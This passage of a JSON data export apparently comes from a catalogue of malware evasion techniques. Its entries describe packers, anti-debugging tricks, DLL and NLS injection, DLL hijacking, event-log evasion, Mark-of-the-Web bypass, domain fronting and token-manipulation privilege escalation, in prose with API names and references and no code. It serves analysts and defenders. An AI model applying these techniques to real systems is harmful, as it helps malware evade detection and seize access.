"description": "ConfuserEx is a open-source protector for .NET applications. It is the successor of Confuser project. It's primarily designed to make reverse engineering difficult for applications written in .NET languages like C# and VB.NET. ConfuserEx does this by using a variety of techniques like symbol renaming, control flow obfuscation, and encryption of strings and resources.\r\n\r\n- Supports .NET Framework 2.0/3.0/3.5/4.0/4.5/4.6/4.7/4.8\r\n\r\n- Symbol renaming (Support WPF/BAML)\r\n\r\n- Protection against debuggers/profilers\r\n\r\n- Protection against memory dumping\r\n\r\n- Protection against tampering (method encryption)\r\n\r\n- Control flow obfuscation\r\n\r\n- Constant/resources encryption\r\n\r\n- Reference hiding proxies\r\n\r\n- Disable decompilers\r\n\r\n- Embedding dependency\r\n\r\n- Compressing output",
"resources": "https://github.com/mkaring/ConfuserEx\r\nhttps://cod3nym.github.io/Detecting-Stealthy-ConfuserEx-with-Yara",
"creation_date": "2022-06-20T02:37:37.730000Z",
"tags": "",
"modification_date": "2024-01-09T04:04:09.009000Z",
"category": [
12
],
"rules": [
101,
137,
142
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
32
]
},
{
"id": 199,
"key": "hxor-packer",
"unprotect_id": "U1418",
"name": "hXOR Packer",
"description": "hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.\r\n\r\nThe unpacker will decompress and decrypt the packed PE and execute it directly from memory without needing any hard disk space to execute.",
"resources": "https://github.com/fscene8/hXOR-Packer",
"creation_date": "2022-06-20T02:39:51.042000Z",
"tags": "hxor, packer",
"modification_date": "2024-01-04T23:13:58.854000Z",
"category": [
12
],
"rules": [
138
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
31
]
},
{
"id": 200,
"key": "pelock",
"unprotect_id": "U1419",
"name": "PELock",
"description": "PELock is a software security solution designed for the protection of any 32 bit Windows applications against cracking, tampering and reverse engineering analysis.",
"resources": "https://www.pelock.com/products/pelock",
"creation_date": "2022-06-20T02:41:58.804000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:11.843000Z",
"category": [
12
],
"rules": [
114
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 201,
"key": "axprotector",
"unprotect_id": "U1420",
"name": "AxProtector",
"description": "AxProtector encrypts the complete software you aim to protect, and shields it with a security shell, AxEngine. Best-of-breed anti-debugging and anti-disassembly methods are then injected into your software.",
"resources": "https://www.wibu.com/us/products/protection-suite/axprotector.html",
"creation_date": "2022-06-20T02:45:08.365000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:11.075000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 202,
"key": "obsidium",
"unprotect_id": "U1421",
"name": "Obsidium",
"description": "Obsidium is a software protection and licensing system that is designed to protect 32-bit and 64-bit Windows software applications and games from reverse engineering, unauthorized modifications (\"cracking\") and redistribution (\"software piracy\") while providing a licensing system.",
"resources": "https://www.obsidium.de/home",
"creation_date": "2022-06-20T02:47:00.242000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:15.699000Z",
"category": [
12
],
"rules": [
115
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 203,
"key": "net-anti-decompiler",
"unprotect_id": "U1422",
"name": ".Net Anti-Decompiler",
"description": ".Net Anti-Decompiler is a protective tool for .Net assemblies. It provides an extra layer of security and compliance to .Net application from reverse engineering.",
"resources": "https://www.techipick.com/dotnet-anti-decompiler",
"creation_date": "2022-06-20T02:48:35.078000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:13.718000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 204,
"key": "net-reactor",
"unprotect_id": "U1423",
"name": ".Net Reactor",
"description": ".NET Reactor is used to prevent reverse engineering by adding different protection layers to .NET assemblies. Beside standard obfuscation techniques it includes special features like NecroBit, Virtualization, x86 Code Generation or Anti Tampering.",
"resources": "https://www.eziriz.com/dotnet_reactor.htm",
"creation_date": "2022-06-20T02:50:46.208000Z",
"tags": "",
"modification_date": "2024-01-10T00:08:43.726000Z",
"category": [
12
],
"rules": [
140,
144,
145
],
"attachments": [],
"featured_api": [],
"contributors": [
32
]
},
{
"id": 205,
"key": "theark",
"unprotect_id": "U1424",
"name": "theArk",
"description": "Packer tool developed in C/C++. Full implementation of the linker, dynamic decompression and spraying in memory to complete file mapping.",
"resources": "https://github.com/aaaddress1/theArk",
"creation_date": "2022-06-20T02:56:05.346000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:09.559000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 206,
"key": "pespin",
"unprotect_id": "U1425",
"name": "PESpin",
"description": "PESpin is a Windows executable files protector, compressor coded in Win32ASM using MASM. Overall, this application will enable the compression of the entire executable - code, data, and resources, thus leaving the file protected against patching or disassembling.",
"resources": "http://downloads.fyxm.net/PESpin-95477.html",
"creation_date": "2022-06-20T02:58:01.613000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:16.896000Z",
"category": [
12
],
"rules": [
116
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 207,
"key": "dtpacker",
"unprotect_id": "U1416",
"name": "DTPacker",
"description": "DTPacker is a .NET packer or downloader which although seeing considerable variety in the first stage, uses a second stage with a fixed password as part of the decoding. \r\n\r\nThe main difference between a packer and a downloader is the location of the payload data which is embedded in the former and downloaded in the latter. DTPacker uses both forms. It is unusual for a piece of malware to be both a packer and downloader. \r\n\r\nThis packer uses multiple obfuscation techniques to evade antivirus, sandboxing, and analysis. It is likely distributed on underground forums",
"resources": "https://www.proofpoint.com/au/blog/threat-insight/dtpacker-net-packer-curious-password-1",
"creation_date": "2022-06-20T03:02:59.757000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:15.166000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 208,
"key": "nls-code-injection-through-registry",
"unprotect_id": "U1237",
"name": "NLS Code Injection Through Registry",
"description": "Dll injection through registry modification of NLS code page ID is a technique used by malware to inject a malicious DLL into a process by modifying the NLS code page ID in the registry.\r\n\r\nThere are two ways to accomplish this technique:\r\n1. Calling the `SetThreadLocale` function and setting up an export function named `NlsDllCodePageTranslation`, where the main payload is located.\r\n2. Using the `SetConsoleCp` or `SetConsoleOutputCP` functions to modify the code page ID. If the process is not console-based, it is possible to allocate a console using the `AllocConsole` function.",
"resources": "https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
"creation_date": "2022-06-20T04:57:44.171000Z",
"tags": "Dll injection, registry modification, NLS code page ID, SetThreadLocale, NlsDllCodePageTranslation, SetConsoleCp, SetConsoleOutputCP, AllocConsole, malware, proof of concept, position-independent shellcode, remote process, stager, loading of DLL",
"modification_date": "2023-10-04T10:42:36.449000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
1,
3,
4,
6,
12,
23,
313,
321,
322,
329,
356,
381,
401,
411,
445,
450
],
"contributors": [
5
]
},
{
"id": 209,
"key": "cloudeyedarkeye",
"unprotect_id": "U1426",
"name": "CloudEye/DarkEye",
"description": "CloudEyE, an evolved version of DarkEyE, allows threat actors to use different types of malware of their choice and make it undetectable to anti-virus solutions. This program is being sold by legitimate Italian company which markets it as a tool for developers that want to protect their program from piracy and reverse engineering. The tutorials published and forum posts about CloudEyE prove that the objective of the program is to aid malicious activities.",
"resources": "https://www.securitycode.eu/\nhttps://atlas-cybersecurity.com/cyber-threats/cloudeye-darkeye-evolved/",
"creation_date": "2022-06-21T23:39:37.553000Z",
"tags": "cloudeye,darkeye",
"modification_date": "2023-10-04T10:43:29.096000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
5
]
},
{
"id": 210,
"key": "cryptone",
"unprotect_id": "U1427",
"name": "CryptOne",
"description": "A packing software called CryptOne became popular among some major threat actors. It was first reported by Fox-IT that the group behind Wastedlocker has begun using it, as well as Netwalker, Gozi ISFB v3, ZLoader, Emotet, Dridex, and Smokeloader.",
"resources": "https://www.deepinstinct.com/blog/a-deep-dive-into-packing-software-cryptone\nhttps://github.com/Tera0017/de-CryptOne",
"creation_date": "2022-06-21T23:43:38.665000Z",
"tags": "cryptone",
"modification_date": "2023-10-04T10:43:28.384000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
5
]
},
{
"id": 211,
"key": "bobsoft-mini-delphi-packer",
"unprotect_id": "U1428",
"name": "BobSoft Mini Delphi Packer",
"description": "The Delphi programming language can be an easy way to write applications and programs that leverage Windows API functions. In fact, some actors deliberately include the default libraries as a diversion to hamper static analysis and make the application \"look legit\" during dynamic analysis. \r\n\r\nThe packer goes to great lengths to ensure that it is not running in an analysis environment. Normal user activity involves many application windows being rotated or changed over a period of time. The first variant of the packer uses `GetForegroundWindow` API to check for the user activity of changing windows at least three times before it executes further. If it does not see the change of windows, it puts itself into an infinite sleep.",
"resources": "https://www.mandiant.com/resources/increased-use-of-delphi-packer-to-evade-malware-classification",
"creation_date": "2022-06-21T23:48:10.193000Z",
"tags": "delphi,packer",
"modification_date": "2023-10-04T10:44:06.182000Z",
"category": [
12
],
"rules": [
117
],
"attachments": [],
"featured_api": [],
"contributors": [
5
]
},
{
"id": 212,
"key": "int-0x2d",
"unprotect_id": "U0129, B0001.006",
"name": "INT 0x2D",
"description": "When the instruction `INT2D` is executed, the exception `EXCEPTION_BREAKPOINT` is raised. Windows uses the EIP register as an exception address and then increments the EIP register value. Windows also examines the value of the EAX register while `INT2D` is executed.",
"resources": "https://www.autosectools.com/anti-debugging-with-exceptions.pdf\nhttps://anti-debug.checkpoint.com/techniques/assembly.html#int2d",
"creation_date": "2022-06-22T01:41:35.414000Z",
"tags": "int2d",
"modification_date": "2023-10-04T10:43:47.504000Z",
"category": [
3
],
"rules": [
70
],
"attachments": [],
"featured_api": [
360,
593
],
"contributors": [
5
]
},
{
"id": 213,
"key": "ice-0xf1",
"unprotect_id": "U0130",
"name": "ICE 0xF1",
"description": "ICEBP is an undocumented instruction that serves as a single byte interrupt 1, generating a single step exception. It can be used to detect if the program is traced.",
"resources": "",
"creation_date": "2022-06-22T01:46:01.067000Z",
"tags": "0xf1,icebp",
"modification_date": "2023-10-04T10:39:34.137000Z",
"category": [
3
],
"rules": [
70,
87
],
"attachments": [],
"featured_api": [
360
],
"contributors": [
5
]
},
{
"id": 214,
"key": "trap-flag",
"unprotect_id": "U0131",
"name": "Trap Flag",
"description": "There is a Trap Flag in the Flags register. Bit number 8 of the EFLAGS register is the trap flag. When the Trap Flag is set, a SINGLE_STEP exception is generated.",
"resources": "",
"creation_date": "2022-06-22T01:50:58.910000Z",
"tags": "trapflag",
"modification_date": "2023-10-04T10:43:27.051000Z",
"category": [
3
],
"rules": [
85
],
"attachments": [],
"featured_api": [
360,
593
],
"contributors": [
5
]
},
{
"id": 215,
"key": "windows-event-log-evasion-via-native-apis",
"unprotect_id": "U0307",
"name": "Windows Event Log Evasion via Native APIs",
"description": "Attackers can leverage native Windows API calls to install malicious services without generating correlating entries in the event log. Using native APIs to install services instead of the standard API calls allow attackers to bypass security controls and event logging. This technique was utilised by Stuxnet.\r\n\r\nServices are typically created through a standard Windows API call `CreateServiceA` or `CreateService`. This API is also called by the service creating Windows native tool “sc.exe” to register a service on a machine. A call to this API subsequently generates entries in the event log which corresponds to the service creation event IDs. \r\n\r\nAttackers can create services without relying on the typical API call `CreateServiceA` by directly interacting with the Windows native API calls instead. For example, the `StartService` API will a make a call to the native API `NdrClientCall2` along with registering the service start events in the event logs. \r\n\r\nBy directly calling `NdrClientCall2` to start a service that’s had the registry keys manually created, the service is started and running, and no event logs are created allowing to evade forensic analysis. This will result in a malicious service running and without any event log entry. \r\n\r\nTo take this a step further, attackers can remove the evidence in the registry and any correlating evidence loaded in the memory of “services.exe”. This leaves with no registry artefacts and no event log information to analyse.",
"resources": "https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html",
"creation_date": "2022-06-27T10:44:00.403000Z",
"tags": "stuxnet,antiforensic",
"modification_date": "2023-10-04T10:44:07.307000Z",
"category": [
8
],
"rules": [
83
],
"attachments": [],
"featured_api": [
31,
33,
331,
381,
413
],
"contributors": []
},
{
"id": 216,
"key": "flirt-signatures-evasion",
"unprotect_id": "U0220",
"name": "FLIRT Signatures Evasion",
"description": "FLIRT Signature evasion is a technique used by malware to hide malicious code inside legitimate functions from known libraries. FLIRT (Fast Library Identification and Recognition Technology) is a database that contains signature patterns for identifying known functions from legitimate libraries. \r\n\r\nMalware authors can abuse these signatures by modifying or adding specific bytes to the code, so that it appears to be a legitimate function when scanned by a FLIRT database. This can trick reverse engineering tools that rely on FLIRT signatures without performing further analysis, and make it more difficult for security analysts to identify and analyze the malware. \r\n\r\nBy using this technique, malware authors can evade detection and make their code more difficult to understand and analyze.",
"resources": "https://hex-rays.com/products/ida/tech/flirt/in_depth/\nhttps://github.com/Maktm/FLIRTDB\nhttps://www.virustotal.com/gui/file/a41ba65405a032f4450ba80882cdd01d715d9d1684f4204050566be29a6dedb0",
"creation_date": "2022-07-01T07:35:35.174000Z",
"tags": "FLIRT (Fast Library Identification and Recognition Technology),\r\nSignature evasion,\r\nCode modification,\r\nLegitimate functions,",
"modification_date": "2023-10-04T10:43:35.037000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [
23
],
"contributors": []
},
{
"id": 217,
"key": "change-module-name-at-runtime",
"unprotect_id": "U1238",
"name": "Change Module Name at Runtime",
"description": "It is possible to change the name of the current process or any of its modules at runtime. This is achieved by accessing the process PEB's member 'Ldr', in particular it has a member 'InOrderMemoryLinks' which we can iterate through to get a list of the process's modules. \r\n\r\nOn each iteration it gets a `PLDR_DATA_TABLE_ENTRY` structure to work with which contains a member `UNICODE_STRING FullDllName`, which can be overwritten with the module name.",
"resources": "",
"creation_date": "2022-07-18T06:56:56.957000Z",
"tags": "",
"modification_date": "2022-07-18T06:56:56.957000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 218,
"key": "change-module-base-address-at-runtime",
"unprotect_id": "U1239",
"name": "Change Module Base Address at Runtime",
"description": "It is possible to change the `DllBase` of a module at runtime. This can trick debugging and analysis tools such as IDA or Cheat Engine into thinking a module's base is actually at another address. \r\n\r\nThis is achieved by accessing the process PEB's member 'Ldr', in particular it has a member `InOrderMemoryLinks` which we can iterate through to get a list of the process's modules. On each iteration we get a `PLDR_DATA_TABLE_ENTRY` structure to work with which contains a member PVOID `DllBase`, that can be overwritten with the new module base address.",
"resources": "",
"creation_date": "2022-07-18T07:01:37.901000Z",
"tags": "",
"modification_date": "2022-07-18T07:01:37.901000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 219,
"key": "dll-proxying",
"unprotect_id": "U1240",
"name": "DLL Proxying",
"description": "DLL proxying is a technique used by malware to evade detection and gain persistence on a system. It involves replacing a legitimate DLL with a malicious DLL that has the same exported functions and is named similarly to the legitimate DLL. \r\n\r\nWhen a program attempts to load the legitimate DLL, it will instead load the malicious DLL, which acts as a proxy for the legitimate DLL. The malicious DLL will redirect function calls to the legitimate DLL, allowing the malware to execute its own code and perform malicious actions without the program realizing that it is not the legitimate DLL. \r\n\r\nThis technique allows the malware to operate stealthily and evade detection by security software, as the malicious DLL is designed to mimic the legitimate DLL. This makes it difficult for security software to differentiate between the legitimate and malicious DLLs, allowing the malware to continue to operate undetected.",
"resources": "https://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence\nhttps://itm4n.github.io/dll-proxying/\nhttps://github.com/Sh0ckFR/DLLirant",
"creation_date": "2022-07-25T09:10:00.495000Z",
"tags": "DLL proxying,\r\nCode obfuscation,\r\nPersistence,\r\nDLL redirection,\r\nStealth operation,",
"modification_date": "2023-10-04T10:43:33.827000Z",
"category": [
4
],
"rules": [
124
],
"attachments": [],
"featured_api": [],
"contributors": [
21
]
},
{
"id": 220,
"key": "hijack-execution-flow-dll-search-order-hijacking",
"unprotect_id": "T1574.001",
"name": "Hijack Execution Flow: DLL Search Order Hijacking",
"description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\r\n\r\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. \r\n\r\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.\r\n\r\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
"resources": "https://attack.mitre.org/techniques/T1574/001/\nhttps://pentestlab.blog/2017/03/27/dll-hijacking/\nhttps://itm4n.github.io/windows-dll-hijacking-clarified/\nhttps://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0\nhttps://github.com/Sh0ckFR/DLLirant",
"creation_date": "2022-07-25T09:16:49.633000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\nexecute malicious payloads,\r\ntrojan dynamic-link library files (DLLs) ,\r\nDLL preloading,\r\nbinary planting attacks,\r\nmimic legitimate DLL,\r\nDLL redirection,",
"modification_date": "2023-10-04T10:43:51.456000Z",
"category": [
10
],
"rules": [
123
],
"attachments": [],
"featured_api": [
2,
249
],
"contributors": []
},
{
"id": 221,
"key": "tamper-dll-export-names-getprocaddress-spoofing",
"unprotect_id": "U1241",
"name": "Tamper DLL Export Names & GetProcAddress Spoofing",
"description": "When a process is running, it is possible to change the results of the call to `GetProcAddress` API, for the exported functions of a module along with modifying the export's offsets and name at runtime. \r\n\r\nFor example, the offset of `kernel32.dll's` function `VirtualAlloc` can be change to the offset of another function. When `VirtualAlloc` is called (after getting its address from `GetProcAddress`), the second function will be called instead. \r\n\r\nTo achieve this, it is possible to use the WINAPI `MapAndLoad` from `ImageHlp.h`, then use `ImageDirectoryEntryToData` to get the list of exports. Then the `ImageRvaToVa` API can be used to retrieve each exported functions names offset; if desired the export name can be overwritten, resulting in calls to `GetProcAddress` with that export name to fail or be directed to another function.",
"resources": "",
"creation_date": "2022-08-11T10:08:44.579000Z",
"tags": "",
"modification_date": "2022-12-06T02:29:18.282000Z",
"category": [
4
],
"rules": [
122
],
"attachments": [],
"featured_api": [
3,
7,
381,
404,
425
],
"contributors": []
},
{
"id": 222,
"key": "mark-of-the-web-motw-bypass",
"unprotect_id": "U0517",
"name": "Mark-Of-The-Web (MOTW) Bypass",
"description": "Mark-of-the-Web (MOTW) is a security feature originally introduced by Internet Explorer. When downloading a file, Internet Explorer creates an ADS named Zone.Identifier and adds a ZoneId to this stream to indicate from which zone the file originates. It is used on Windows OS to trigger a Windows Defender SmartScreen detection and raise an alert to the user about the file. \r\n\r\nThe following ZoneId values may be used in a Zone.Identifier ADS:\r\n\r\n* 0 Local computer\r\n* 1 Local intranet\r\n* 2 Trusted sites\r\n* 3 Internet\r\n* 4 Restricted sites\r\n\r\nIn some cases, the Alternate Data Stream will be `SmartScreen` with the value `anaheim`. To bypass this security feature malware authors can use file format that does not manage the MOTW such as ISO or VHD file. \r\n\r\nUsing `git clone` can also be an alternative as a file cloned from GitHub with the Git client does not have a Zone.Identifier ADS.",
"resources": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/\nhttps://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
"creation_date": "2022-10-20T01:29:37.644000Z",
"tags": "#MOTW",
"modification_date": "2023-10-04T10:42:22.593000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 223,
"key": "dirty-vanity",
"unprotect_id": "U1242",
"name": "Dirty Vanity",
"description": "Dirty Vanity is a process injection technique that exploits the Windows forking (process reflection and snapshotting) feature to inject code into a new process. \r\n\r\nIt uses the `RtlCreateProcessReflection` or `NtCreateProcess[Ex]` primitives, along with the `PROCESS_VM_OPERATION`, `PROCESS_CREATE_THREAD`, and `PROCESS_DUP_HANDLE` flags to reflect and execute code in a new process. \r\n\r\nThe technique also makes use of various methods, such as `NtCreateSection` and `NtMapViewOfSection`, `VirtualAllocEx` and `WriteProcessMemory`, and `NtSetContextThread` (also known as Ghost Writing), to write the injected code into the new process. \r\n\r\nThis technique is designed to evade detection by endpoint security solutions, as the injected code appears to have been written to the new process, rather than being injected from an external source.",
"resources": "https://github.com/deepinstinct/Dirty-Vanity\nhttps://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf",
"creation_date": "2022-12-18T03:19:30.703000Z",
"tags": "Process injection,\r\nWindows forking,\r\nProcess reflection,\r\nSnapshotting,\r\nRtlCreateProcessReflection,\r\nNtCreateProcess,\r\nNtCreateProcessEx,\r\nFork,\r\nExecute,\r\nPROCESS_VM_OPERATION,\r\nPROCESS_CREATE_THREAD,\r\nPROCESS_DUP_HANDLE,\r\nNtCreateSection,\r\nNtMapViewOfSection,\r\nVirtualAllocEx,\r\nWriteProcessMemory\r\nNtSetContextThread,\r\nGhost Writing,",
"modification_date": "2023-10-04T10:43:30.875000Z",
"category": [
4
],
"rules": [],
"attachments": [
"21196959-579d-4561-b450-0f3453f4e91d"
],
"featured_api": [
3,
4,
6,
7,
24,
381,
425
],
"contributors": []
},
{
"id": 224,
"key": "milfuscator",
"unprotect_id": "U1429",
"name": "Milfuscator",
"description": "Milfuscator is a tool used to obfuscate the code in a Portable Executable (PE) file by modifying and expanding the existing code in the \".text\" section, without creating any new sections. It does this using the Zydis and AsmJit libraries, and is based on the concept of code mutation from a P2C project for the game Counter-Strike: Global Offensive. The tool is an open-source project.",
"resources": "https://github.com/nelfo/Milfuscator",
"creation_date": "2022-12-24T04:07:22.663000Z",
"tags": "Zydis,\r\nAsmJit,\r\nCode mutation,\r\nObfuscation,\r\nPacker,",
"modification_date": "2023-10-04T10:42:07.191000Z",
"category": [
12
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 225,
"key": "domain-fronting",
"unprotect_id": "U0908, T1090.004",
"name": "Domain Fronting",
"description": "Domain fronting is a technique used to hide the true destination of internet traffic. It may be used to hide the real destination of an offensive payload or is could be used to bypass censorship or any form of network restriction. The technique may be used through CDN infrastructure or on any infrastructure that perform separation between SSL and http backend.\r\n\r\nIt involves SSL/TLS connection since it abuse of the destination requested in the SNI (Server Name Indication) field at SSL level at \"Front\" and the real hosname requested by the HOST header at the HTTP level. In clear you declare one destination at SSL level and another one at HTTP level. From an defender point on view you see only the SSL destination in the firewall logs and not the real final destination.\r\n\r\nAdditionally, some other headers may be used to facilitate domain fronting like \"X-Forwarded-Host\" and \"X-Originating-URL\". But these headers may vary depending on the implementation.\r\n\r\nSuch techniques were exploited by groups like APT29. Hovewer, some cloud providers like AWS, Google Cloud, and Cloudflare among others, have started to detect and block domain fronting attempts. Since then a new technics named domain hiding as been discovered. This is a complementary technique that as been presented by Erik Hunstad at defcon 2020. This techniques use the ESNI header in the TLS3.1 version.",
"resources": "https://en.wikipedia.org/wiki/Domain_fronting\nhttps://attack.mitre.org/techniques/T1090/004/",
"creation_date": "2023-01-15T07:04:21.021000Z",
"tags": "Domain fronting,\r\nbypass censorship,\r\nnetwork restriction,\r\nSSL/TLS connection,\r\nSNI (Server Name Indication) field,\r\nX-Forwarded-Host,\r\nX-Originating-URL,\r\nAPT29,\r\nTLS3.1 version,",
"modification_date": "2023-10-04T10:45:00.870000Z",
"category": [
9,
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 226,
"key": "homograph-attack-punycode",
"unprotect_id": "U0909",
"name": "Homograph Attack (Punycode)",
"description": "A homograph attack is a type of phishing attack that uses homoglyphs (characters that look similar to other characters) to create domain names or URLs that appear to be legitimate, but are actually controlled by an attacker. Homograph attacks take advantage of the fact that many languages have characters that are visually similar to characters used in other languages.\r\n\r\nFor example, the letter \"a\" in the Latin alphabet and the character \"а\" in the Cyrillic alphabet are visually similar. An attacker can register a domain name using the Cyrillic \"а\" and create a website that looks like a legitimate website, but is actually controlled by the attacker.\r\n\r\nThe attack works by exploiting the way domain names are encoded in Punycode. Punycode is a way of representing Unicode characters with the limited character subset of ASCII used for Internet host names. This allows for domain names containing non-Latin characters, such as Chinese or Arabic, to be represented in an ASCII format that can be understood by systems that only support ASCII characters.\r\n\r\nThis means that an attacker can register a domain name that uses characters from different languages that look similar to characters from the Latin alphabet, like \"а\" instead of \"a\" and create a website that looks almost identical to a legitimate website.\r\n\r\nThese attacks are very similar to typosquatting. Browser vendors have implemented features to help protect users from homograph attacks by displaying the Punycode version of domain names containing non-Latin characters.",
"resources": "https://en.wikipedia.org/wiki/IDN_homograph_attack\nhttps://en.wikipedia.org/wiki/Punycode\nhttps://blog.securitybreak.io/fifty-shades-of-malware-strings-d33b0c7bee99",
"creation_date": "2023-01-16T00:36:02.612000Z",
"tags": "Homograph attack, phishing attack, homoglyphs, domain names, URLs, legitimate, attacker, encoding, Punycode, Unicode characters, ASCII, Internet host names, non-Latin characters, Latin alphabet, Cyrillic alphabet, typosquatting,",
"modification_date": "2023-10-04T10:44:03.843000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 228,
"key": "access-token-manipulation-token-impersonationtheft",
"unprotect_id": "T1134.001",
"name": "Access Token Manipulation: Token Impersonation/Theft",
"description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\r\n\r\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.",
"resources": "https://attack.mitre.org/techniques/T1134/001/",
"creation_date": "2023-01-27T02:44:10.190000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nToken impersonation, \r\nToken theft, \r\nDuplicateToken(Ex), \r\nImpersonateLoggedOnUser, \r\nSetThreadToken\r\nAPT28,",
"modification_date": "2023-10-04T10:44:04.019000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 229,
"key": "access-token-manipulation-create-process-with-token",
"unprotect_id": "T1134.002",
"name": "Access Token Manipulation: Create Process with Token",
"description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.\r\n\r\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as Token Impersonation/Theft or Make and Impersonate Token).",
"resources": "https://attack.mitre.org/techniques/T1134/002/",
"creation_date": "2023-01-27T02:49:53.607000Z",
"tags": "Defense Evasion,\r\nPrivilege Escalation,\r\nCreateProcessWithTokenW,\r\nrunas,\r\nToken Impersonation,\r\nToken Theft,\r\nMake Token,\r\nImpersonate Token,",
"modification_date": "2023-10-04T10:44:05.237000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 230,
"key": "access-token-manipulation-make-and-impersonate-token",
"unprotect_id": "T1134.003",
"name": "Access Token Manipulation: Make and Impersonate Token",
"description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.",
"resources": "https://attack.mitre.org/techniques/T1134/003/",
"creation_date": "2023-01-27T02:52:16.671000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nLogonUser,\r\nSetThreadToken,\r\nCobalt Strike,",
"modification_date": "2023-10-04T10:43:00.794000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 231,
"key": "access-token-manipulation-sid-history-injection",
"unprotect_id": "T1134.005",
"name": "Access Token Manipulation: SID-History Injection",
"description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\r\n\r\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, SMB/Windows Admin Shares, or Windows Remote Management.",
"resources": "https://attack.mitre.org/techniques/T1134/005/",
"creation_date": "2023-01-27T02:56:18.913000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nbypass access controls,\r\nWindows security identifier (SID)\r\nSID-History Active Directory,\r\nimpersonate users,\r\nlateral movement,\r\nMISC::AddSid, \r\nMimikatz,",
"modification_date": "2023-10-04T10:45:01.018000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 232,
